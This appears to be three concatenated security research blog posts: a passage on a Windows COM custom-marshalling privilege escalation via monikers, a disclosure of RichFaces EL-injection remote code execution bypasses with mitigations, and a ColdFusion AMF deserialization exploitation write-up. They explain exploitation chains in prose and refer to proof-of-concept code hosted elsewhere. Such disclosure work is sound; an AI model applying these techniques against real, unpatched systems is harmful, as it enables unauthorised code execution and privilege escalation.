The function pointers in the COM object point to functions of the proxy class. When we execute the IOpenControlPanel::Open()" method, the method OneCoreUAPCommonProxyStub!ObjectStublessClient3() gets called on the proxy. The proxy class itself eventually calls RPC methods (e.g. RPCRT4!NdrpClientCall3) to send the parameters to the RPC server in the out-of-process server. The parameters need to get serialized/marshalled to send them over RPC. In the out-of-process-server the parameters get deserialized/unmarshalled and the Stub invokes shell32!COpenControlPanel::Open(). For non-complex parameters like strings the serialization/marshalling is trivial as these are sent by value.

How about complex parameters like COM objects? As we can see from the method definition of IOpenControlPanel::Open() the third parameter is a pointer to an IUnknown COM object:
The answer is that a complex object can either get marshalled by reference (standard marshalling) or the serialization/marshalling logic can be customized by implementing the IMarshal interface (custom marshalling).

The IMarshal interface has a few methods as we can see in the following definition:
During serialization/marshalling of a COM object the IMarshal::GetUnmarshalClass() method gets called by the COM which returns the GUID of the class to be used for unmarshalling. Then the method IMarshal::GetMarshalSizeMax() is called to prepare a buffer for marshalling data. Finally the IMarshal::MarshalInterface() method is called which writes the custom marshalling data to the IStream object. The COM runtime sends the GUID of the "Unmarshal class" and the IStream object via RPC to the server.

On the server the COM runtime creates the "Unmarshal class" using the CoCreateInstance() function, casts it to the IMarshal interface using QueryInterface and eventually invokes the IMarshsal::UnmarshalInterface() method on the "Unmarshal class" instance, passing the IStream as a parameter.

And that's also where all the misery starts ...

Diffing the patch

After downloading the patch for Windows 8.1 x64 and extracting the files, I found two patched DLLs related to Microsoft COM:

oleaut32.dll
comsvcs.dll

Using Hexray's IDA Pro and Joxean Koret's Diaphora I analyzed the changes made by Microsoft.
In oleaut32.dll several functions were changed but nothing special related to deserialisation/marshalling:

In comsvcs.dll only four functions were changed:

Clearly, one method stood out: CMarshalInterceptor::UnmarshalInterface().

The method CMarshalInterceptor::UnmarshalInterface() is the implementation of the UnmarshalInterface() method of the IMarshal interface. As we already know from the introduction this method gets called during unmarshalling.

The bug

Further analysis was done on Windows 10 Redstone 4 (1803) including March patches (ISO from MSDN). In the very beginning of the method CMarshalInterceptor::UnmarshalInterface() 20 bytes are read from the IStream object into a buffer on the stack.

Later the bytes in the buffer are compared against the GUID of the CMarshalInterceptor class (ECABAFCB-7F19-11D2-978E-0000F8757E2A). If the bytes in the stream match we reach the function CMarshalInterceptor::CreateRecorder().

In function CMarshalInterceptor::CreateRecorder() the COM-API function ReadClassStm is called. This function reads a CLSID(GUID) from the IStream and stores it into a buffer on the stack. Then the CLSID gets compared against the GUID of a CompositeMoniker.
As you may have already followed the different Moniker "vulnerabilities" in 2016/17 (URLMoniker, ScriptMoniker, SOAPMoniker), Monikers are definitely something you want to find in code which you might be able to trigger.

The IMoniker interface inherits from IPersistStream which allows a COM object implementing it to load/save itself from/to an IStream object. Monikers identify objects uniquely and can locate, activate and get a reference to the object by calling the BindToObject() method of the IMoniker instance.

If the CLSID doesn't match the GUID of the CompositeMoniker we follow the path to the right. Here, the COM-API functionCoCreateInstance() is called with the CLSID read from the IStream as the first parameter. If COM finds the specific class and is able to cast it to an IMoniker interface we reach the next basic block. Next, the IPersistStream::Load() method is called on the newly created instance which restores the saved Moniker state from the IStream object.

And finally we reach the call to BindToObject() which triggers all evil ...

Exploiting the bug

For exploitation I'm following the same approach as described in the bug tracker issue "DCOM DCE/RPC Local NTLM Reflection Elevation of Privilege" by Project Zero.
I'm creating a fake COM Object class which implements the IStorage and IMarshal interfaces.

All implementation methods for the IStorage interface will be forwarded to a real IStorage instance as we will see later. Since we are implementing custom marshalling, the COM runtime wants to know which class will be used to deserialize/unmarshal our fake object. Therefore the COM runtime calls IMarshal::GetUnmarshalClass(). To trigger the Moniker, we just need to return the GUID of the "QC Marshal Interceptor Class" class (ECABAFCB-7F19-11D2-978E-0000F8757E2A).

The final step is to implement the IMarshal::MarshalInterface() method. As you already know the method gets called by the COM runtime to marshal an object into an IStream.
To trigger the call to IMoniker::BindToObject(), we only need to write the required bytes to the IStream object to satisfy all conditions in CMarshalInterceptor::UnmarshalInterface().

I tried to create a Script Moniker COM object with CLSID {06290BD3-48AA-11D2-8432-006008C3FBFC} using CoCreateInstance(). But hey, I got a "REGDB_E_CLASSNOTREG" error code. Looks like Microsoft introduced some changes. Apparently, the Script Moniker wouldn't work anymore. So I thought of exploiting the bug using the "URLMoniker/hta file". But luckily I remembered that in the method CMarshalInterceptor::CreateRecorder() we had a check for a CompositeMoniker CLSID.

So following the left path, we have a basic block in which 4 bytes are read from the stream into the stack buffer (var_78). Next we have a call to CMarshalInterceptor::LoadAndCompose() with the IStream, a pointer to an IMoniker interface pointer and the value from the stack buffer as parameters.

.

In this method an IMoniker instance is read and created from the IStream using the OleLoadFromStream() COM-API function. Later in the method, CMarshalInterceptor::LoadAndCompose() is called recursively to compose a CompositeMoniker. By invoking IMoniker::ComposeWith() a new IMoniker is created being a composition of two monikers. The pointer to the new CompositeMoniker will be stored in the pointer which was passed to the current function as parameter. As we have seen in one of the previous screenshots the BindToObject() method will be called on the CompositeMoniker later on.

As I remembered from Haifei Li's blog post there was a way to create a Script Moniker by composing a File Moniker and a New Moniker. Armed with that knowledge I implemented the final part of the IMarshal::MarshalInterface() method.

I placed a SCT file in "c:\temp\poc.sct" which runs notepad from an ActiveXObject. Then I tried BITS as a target server first which didn't work.

Using OleView .NET I found out that BITS doesn't support custom marshalling (see EOAC_NO_CUSTOM_MARSHAL). But the SearchIndexer service with CLSID {06622d85-6856-4460-8de1-a81921b41c4b} was running as SYSTEM and allowed custom marshalling.
So I created a PoC which has the following main() function.

The call to CoGetInstanceFromIStorage() will activate the target COM server and trigger the serialization of the FakeObject instance. Since the COM-API function requires an IStorage as a parameter, we had to implement the IStorage interface in our FakeObject class.
After running the POC we finally have a "notepad.exe" running as SYSTEM.

The POC can be found on our github.

The patch

Microsoft is now checking a flag read from the Thread-local storage. The flag is set in a different method not related to marshalling. If the flag isn't set, the function CMarshalInterceptor::UnmarshalInterface() will exit early without reading anything from the IStream.

Takeaways

Serialization/Unmarshalling without validating the input is bad. That's for sure.
Although this blog post only covers the privilege escalation aspect, the vulnerability can also be triggered from Microsoft Office or by an Active X running in the browser. But I will leave this as an exercise to the reader :-)

Poor RichFaces

code white | Blog

By: Markus Wulftange

30 May 2018 at 13:00

RichFaces is one of the most popular component libraries for JavaServer Faces (JSF). In the past, two vulnerabilities (CVE-2013-2165 and CVE-2015-0279) have been found that allow RCE in versions 3.x ≤ 3.3.3 and 4.x ≤ 4.5.3. Code White discovered two new vulnerabilities which bypass the implemented mitigations. Thereby, all RichFaces versions including the latest 3.3.4 and 4.5.17 are vulnerable to RCE.

Introduction

JavaServer Faces (JSF) is a framework for building user interfaces for web applications. While there are only two major JSF implementations (i. e., Apache MyFaces and Oracle Mojarra), there are several component libraries, which provide additional UI components and features. RichFaces is one of the most popular libraries among these component libraries and since it became part of JBoss (and thereby also part of Red Hat), it is also part of several JBoss/Red Hat products, for example JBoss EAP and JBoss Portal.^[1]

RichFaces has three major version branches: 3.x, 4.x, and 5.x. However, as 5.x has never left alpha state, it is rather irrelevant. In early 2016, the developers of RichFaces announced the end-of-life of RichFaces in June 2016. The latest releases of the respective branches are 3.3.4 and 4.5.17.

The Past

In the past, two significant vulnerabilities have been discovered by Takeshi Terada of MBSD, which both affect various RichFaces versions:

CVE-2013-2165: Arbitrary Java Deserialization in RichFaces 3.x ≤ 3.3.3 and 4.x ≤ 4.3.2: Deserialization of arbitrary Java serialized object streams in org.ajax4jsf.resource.ResourceBuilderImpl allows remote code execution.
CVE-2015-0279: Arbitrary EL Evaluation in RichFaces 4.x ≤ 4.5.3 (RF-13977): Injection of arbitrary EL method expressions in org.richfaces.resource.MediaOutputResource allows remote code execution.

Both vulnerabilities rely on the feature to generate images, video, sounds, and other resources on the fly based on data provided in the request. The provided data is either interpreted as a plain array of bytes or as a Java serialized object stream. In RichFaces 3.x, the data gets appended to the URL path preceded by either /DATB/ (byte array) or /DATA/ (Java serialized object stream); in RichFaces 4.x, the data is transmitted in a request parameter named db (byte array) or do (Java serialized object stream). In all cases, the binary data is compressed using DEFLATE and then encoded using a URL-safe Base64 encoding.

CVE-2013-2165: Arbitrary Java Deserialization

This vulnerability is a straight forward Java deserialization vulnerability. When a RichFaces 3.x resource is requested, it eventually gets processed by ResourceBuilderImpl.getResourceDataForKey(String). If the requested resource key begins with /DATA/, the remaining data gets decoded and decompressed (using ResourceBuilderImpl.decrypt(byte[]), which actually, despite its name, does not incorporate encryption^[2]) and finally deserialized without any further validation.

In RichFaces 4.x, it is basically the same: the org.richfaces.resource.DefaultCodecResourceRequestData holds the request data passed via db/do and Util.decodeObjectData(String) is used in the latter case. That method then decodes and decompresses the data in a similar way and finally deserializes it without any further validation.

This can be exploited with ysoserial using a suitable gadget.

The arbitrary Java deserialization was patched in RichFaces 3.3.4 and 4.3.3 by introducing look-ahead deserialization with a limited set of whitelisted classes.^[3] Due to several aftereffects, the list was extended occasionally.^[4]

CVE-2015-0279: Arbitrary EL Evaluation

The RichFaces issue RF-13977 corresponding to this vulnerability is public and actually quite detailed. It describes that the RichFaces Showcase application utilizes the MediaOutputResource dynamic resource builder. The data object passed in the do URL parameter holds the state object, which is used by MediaOutputResource.restoreState(FacesContext, Object) to restore its state. This includes the contentProducer field, which is expected to be a MethodExpression object. That MethodExpression later gets invoked by MediaOutputResource.encode(FacesContext) to pass execution to the referenced method to generate the resource's contents. In the mentioned example, the EL method expression #{mediaBean.process} references the process method of a Java Bean named mediaBean.

Now the problem with that is that the EL expression can be changed, even just with basic Linux utilities. There is no protection in place that would prevent one from tampering with it. Depending on the EL implementation, this allows arbitrary code execution, as demonstrated by the reporter:

However, exploitation of this vulnerability is not always that easy. Especially if there is no existing sample of a valid do state object that can be tampered with. Because if one would want to create the state object, it would require the use of compatible libraries, otherwise the deserialization may fail. Moreover, the EL implementation does not allow arbitrary expressions with parameterized invocations in method expressions as this has only just been added in EL 2.2. EL exploitation is quite an interesting topic in itself.

The patch for this issue introduced in RichFaces 4.5.4 was to check the expression of the contentProducer whether it contains a parenthesis. This would prevent the invocation of methods with parameters like loadClass("java.lang.Runtime").

The Present

The kind of the past vulnerabilities led to the assumption that there may be a way to bypass the mitigations. And after some research, two ways were found to gain remote code execution in a similar manner also affecting the latest RichFaces versions 3.3.4 and 4.5.17:

RF-14310: Arbitrary EL Evaluation in RichFaces 3.x ≤ 3.3.4: Injection of arbitrary EL expressions allows remote code execution via org.richfaces.renderkit.html.Paint2DResource.
RF-14309: Arbitrary EL Evaluation in RichFaces 4.5.3 ≤ 4.5.17: Injection of arbitrary EL variable mapper allows to bypass mitigation of CVE-2015-0279 and thereby remote code execution.

Although the issues RF-14309 and RF-14310 were discovered in the order of their identifier, we'll explain them in the opposite order. Also note that the issues are not public but only visible to persons responsible to resolve security issues.

RF-14310: Arbitrary EL Evaluation

This vulnerability is very similar to CVE-2015-0279/RF-13799. While the injection of arbitrary EL expressions was possible right from the beginning, there is always a need to get them triggered somehow. This similarity was found in the org.richfaces.renderkit.html.Paint2DResource class. When a resource of that type gets requested, its send(ResourceContext) method gets called. The resource data transmitted in the request must be an org.richfaces.renderkit.html.Paint2DResource$ImageData object. This passes the whitelisting as ImageData extends org.ajax4jsf.resource.SerializableResource, which actually was introduced in 3.3.4 to fix the Java deserialization vulnerability.

RF-14309: Arbitrary EL Evaluation

As the patch to CVE-2015-0279 introduced in 4.5.4 disallowed the use of parenthesis in the EL method expression of the contentProducer, it seemed like a dead end. But if you are fimilar with EL internals, you would know that they can have custom function mappers and variable mappers, which are used by the ELResolver to resolve functions (i. e., name in ${prefix:name()}) and variables (i. e., var in ${var.property}) to Method and ValueExpression instances respectively. Fortunately, various VariableMapper implementations were added to the whitelist starting with 4.5.3.^[5]

So to exploit this, all that is needed is to use a variable in the contentProducer method expression like ${dummy.toString} and add an appropriate VariableMapper to the method expression that maps dummy to a ValueExpression of your choice.

The Future

RichFaces has reached its end-of-life in June 2016 and their RichFaces End-Of-Life Questions & Answers is pretty clear on the time thereafter:

What will happen if a serious bug or security issue is discovered in the future?

There will be no patches after the end of support. In case of discovering a serious issue you will have to develop a patch yourself or switch to another framework.

– RichFaces End-Of-Life Questions & Answers

So we can't expect official patches.

The Bonus

While looking for ways to exploit the recent versions of RichFaces, there were two classes in the JSF API 2.0 and later, which seemed promising:

The interesting thing about these classes is that they have a equals(Object) method, which eventually calls getType(ELContext) on a EL value expression. For example, if equals(Object) gets called on a ValueExpressionValueBindingAdapter object with a ValueExpression object as other, getType(ELContext) of other gets called. And as the value expression has to be evaluated to determine its resulting type, this can be used as a Java deserialization primitive to execute EL value expressions on deserialization.

This is very similar to the Myfaces1 and Myfaces2 gadgets in ysoserial.^[6] However, while they require Apache MyFaces, this one is independent from the JSF implementation and only requires a matching EL implementation.

Unfortunately, this gadget does not work for RichFaces. The reason for that is that ValueExpressionValueBindingAdapter needs to have a valid value binding as getType(ELContext) gets called first. But javax.faces.el.ValueBinding is not whitelisted. And wrapping it in a StateHolderSaver does not work because the state object is of type Object[] and therefore the cast to Serializable[] in StateHolderSaver.restore(FacesContext) fails.^[7] This is probably a bug in RichFaces as Serializable[] is not whitelisted either although StateHolderSaver uses Serializable[] internally on StateHolder instances.

Conclusion

It has been shown that all RichFaces versions 3.x and 4.x including the latest 3.3.4 and 4.5.17 are exploitable by one or multiple vulnerabilities:

RichFaces 3
- 3.1.0 ≤ 3.3.3: CVE-2013-2165
- 3.1.0 ≤ 3.3.4: RF-14310
RichFaces 4
- 4.0.0 ≤ 4.3.2: CVE-2013-2165
- 4.0.0 ≤ 4.5.4: CVE-2015-0279
- 4.5.3 ≤ 4.5.17: RF-14309

As we can't expect official patches, one way to mitigate all these vulnerabilities is to block requests to the concerned URLs:

Blocking requests of URLs with paths containing /DATA/ should mitigate CVE-2013-2165 and RF-14310.
Blocking requests of URLs with paths containing org.richfaces.resource.MediaOutputResource (literally or URL encoded) should mitigate CVE-2015-0279 and RF-14309.

¹ See JBoss Enterprise Application Platform Component Details and Red Hat JBoss Portal Component Details for further version information.
² However, org.ajax4jsf.util.base64.Codec does support DES encryption if a password is set.
³ See commit richfaces4/core@12ee116
⁴ See the history of org/richfaces/resource/resource-serialization.properties in 4.x ≤ 4.3.x and in 4.5.x for reference.
⁵ com.sun.el.lang.VariableMapperImpl and org.apache.el.lang.VariableMapperImpl were added in 4.5.3, org.jboss.el.lang.VariableMapperImpl was added in 4.5.8; see also the history of org/richfaces/resource/resource-serialization.properties in 4.5.x
⁶ See Myfaces1.java and Myfaces2.java in the ysoserial repository on GitHub.
⁷ This actually depends on the JSF API implementation and version. For example, org.jboss.spec.javax.faces/jboss-jsf-api_2.1_spec and org.glassfish/javax.faces do have this unfortunate behavior in all versions while com.sun.faces/jsf-api added it in version 2.1.0.

code white | Blog
Exploiting Adobe ColdFusion before CVE-2017-3066Unknown
13 March 2018 at 14:41

Exploiting Adobe ColdFusion before CVE-2017-3066

code white | Blog

By: Unknown

13 March 2018 at 14:41

In a recent penetration test my teammate Thomas came across several servers running Adobe ColdFusion 11 and 12. Some of them were vulnerable to CVE-2017-3066 but no outgoing TCP connections were possible to exploit the vulnerability. He asked me whether I had an idea how he could still get a SYSTEM shell and the outcome of the short research effort is documented here.

Introduction Adobe ColdFusion & AMF

Before we go into technical details, I will give you a short intro to Adobe ColdFusion (CF). Adobe ColdFusion is an Application Development Platform like ASP.net, however several years older. Adobe ColdFusion allows a developer to build websites, SOAP and REST web services and interact with Adobe Flash using the Action Message Format (AMF).

The AMF protocol is a custom binary serialization protocol. It has two formats, AMF0 and AMF3. An Action Message consists of headers and bodies. Several data types are supported in AMF0 and AMF3. For example the AMF3 format supports the following protocol elements with their type identifier:
Details about the binary message formats of AMF0 and AMF3 can be found on Wikipedia (see https://en.wikipedia.org/wiki/Action_Message_Format).

There are several implementations for AMF in different languages. For Java we have Adobe BlazeDS (now Apache BlazeDS), which is also used in Adobe ColdFusion.
The BlazeDS AMF serializer can serialize complex object graphs. The serializer starts with the root object and serializes its members recursively.
Two general serialization techniques are supported by BlazeDS to serialize complex objects:

Serialization of Bean Properties (AMF0 and AMF3)
Serialization using Java's java.io.Externalizable interface. (AMF3)

Serialization of Bean Properties

This technique requires the object to be serialized to have a public no-arg constructor and for every member public Getter-and Setter-Methods (JavaBeans convention).
In order to collect all member values of an object, the AMF serializer invokes all Getter-methods during serialization. The member names and values are put in the Action message body with the class name of the object.
During deserialization, the classname is taken from the Action Message, a new object is constructed and for every member name the corresponding set method is called with the value as argument. This all happens either in method readScriptObject() of class flex.messaging.io.amf.Amf3Input or readObjectValue() of class flex.messaging.io.amf.Amf0Input.

Serialization using Java's java.io.Externalizable interface

BlazeDS further supports serialization of complex objects of classes implementing the java.io.Externalizable interface which inherits from java.io.Serializable.
Every class implementing this interface needs to provide its own logic to deserialize itself by calling methods on the java.io.ObjectInput-implementation to read serialized primitive types and Strings (e.g. method read(byte[] paramArrayOfByte)).
During deserialization of an object (type 0xa) in AMF3, the method readScriptObject() of class flex.messaging.io.amf.Amf3Input gets called. In line #759 the method readExternalizable is invoked which calls the readExternal() method on the object to be deserialized.

This should be sufficient to serve as an introduction to Adobe ColdFusion and AMF.

Previous work

Chris Gates (@Carnal0wnage) published the paper ColdFusion for Pentesters which is an excellent introduction to Adobe ColdFusion.

Wouter Coekaerts (@WouterCoekaerts) already showed in his blog post that deserializing untrusted AMF data is dangerous.

Looking at the history of Adobe ColdFusion vulnerabilities at Flexera/Secunia's database you can find mostly XSS', XXE's and information disclosures.

The most recent ones are:

Deserialization of untrusted data over RMI (CVE-2017-11283/4 by @nickstadb)
XXE (CVE-2017-11286 by Daniel Lawson of @depthsecurity)
XXE (CVE-2016-4264 by @dawid_golunski)

CVE-2017-3066

In 2017 Moritz Bechler of AgNO3 GmbH and my teammate Markus Wulftange discovered independently the vulnerability CVE-2017-3066 in Apache BlazeDS.
The core problem of this vulnerability was that Adobe Coldfusion never did any whitelisting of allowed classes. Thus any class in the classpath of Adobe ColdFusion, which either fulfills the Java Beans Convention or implements java.io.Externalizable could be sent to the server and get deserialized. Both Moritz and Markus found JRE classes (sun.rmi.server.UnicastRef2 sun.rmi.server.UnicastRef) which implemented the java.io.Externalizable interface and triggered an outgoing TCP connection during AMF3 deserialization. After the connection was made to the attacker's server, its response was deserialized using Java's native deserialization using ObjectInputStream.readObject(). Both found a great "bridge" from AMF deserialization to Java's native deserialization which offers well known exploitation primitives using public gadgets. Details about the vulnerability can also be found in Markus' blog post.
Apache introduced validation through the class flex.messaging.validators.ClassDeserializationValidator. It has a default whitelist but can also be configured with a configuration file. For details see the Apache BlazeDS release notes.

Finding exploitation primitives before CVE-2017-3066

As already mentioned in the very beginning my teammate Thomas required an exploit which also works without outgoing connection.
I had a quick look into the excellent research paper "Java Unmarshaller Security" of Moritz Bechler where he analysed several "Unmarshallers" including BlazeDS. The exploitation payloads he discovered weren't applicable since the libraries were missing in the classpath.
So I started with my typical approach, fired up my favorite "reverse engineering tool" when it comes to Java, Eclipse. Eclipse together with the powerful decompiler plugin "JD-Eclipse" (https://github.com/java-decompiler/jd-eclipse) is all you need for static and dynamic analysis. As a former Dev I was used to work with IDE's which make your life easier and decompiling and grepping through code is often very inefficient and error prone. So I created a new Java project and added all jar-files of Adobe Coldfusion 12 as external libraries.
The first idea was to look for further calls to Java's ObjectInputStream.readObject-method. Using Eclipse this is very easy. Just open class ObjectInputStream, right click on the readObject() method and click "Open Call Hierarchy". Thanks to JD-Eclipse and its decompiler, Eclipse is able to construct call graphs based on class information without having any source. The call graph looks big in the very beginning. But with some experience you see very quickly which nodes in the graph are interesting.
After some hours I found two promising call graphs.

Setter-based Exploit

The first one starts with method setState(byte[] new_state) of class org.jgroups.blocks.ReplicatedTree.

Looking at the implementation of this method, we already can imagine what is happening in line #605. A quick look at the call graph confirms that we eventually end up in a call to ObjectInputStream.readObject().

The only thing to mention here is that the byte[] passed to setState() needs to have an additional byte 0x2 at offset 0x0 as we can see from line 364 of class org.jgroups.util.Util.
The exploit can be found in the following image.

The exploit works against Adobe ColdFusion 12 only since JGroups is only available in this specific version.

Externalizable-based Exploit

The second call graph starts in class org.apache.axis2.util.MetaDataEntry with a call to readExternal which is what we are looking for.

In line #297 we have a call to SafeObjectInputStream.install(inObject).
In this function our AMF3Input instance gets wrapped by a org.apache.axis2.context.externalize.SafeObjectInputStream instance.
In line #341 a new instance of class org.apache.axis2.context.externalize.ObjectInputStreamWithCL is created. This class just extends the standard java.io.ObjectInputStream. In line #342 we finally have our call to readObject().
The following image shows the request for the exploit.

The exploit works against Adobe ColdFusion 11 and 12.

ColdFusionPwn

To make your life easier I created the simple tool ColdFusionPwn. It works on the command line and allows you to generate the serialized AMF message. It incorporates Chris Frohoff's ysoserial for gadget generation. It can be found on our github.

Takeaways

Deserializing untrusted input is bad, that's for sure. From an exploiters perspective exploiting deserialization vulnerabilities is a challenging task since you need to find the "right" objects (gadgets) which trigger functionality you can reuse for exploitation. But it's also more fun :-)

By the way: If you want to make a deep dive into serverside Java Exploitation and all sorts of deserialization vulnerabilities and how to do proper static and dynamic analysis in Java, you might be interested in our upcoming "Advanced Java Exploitation" course.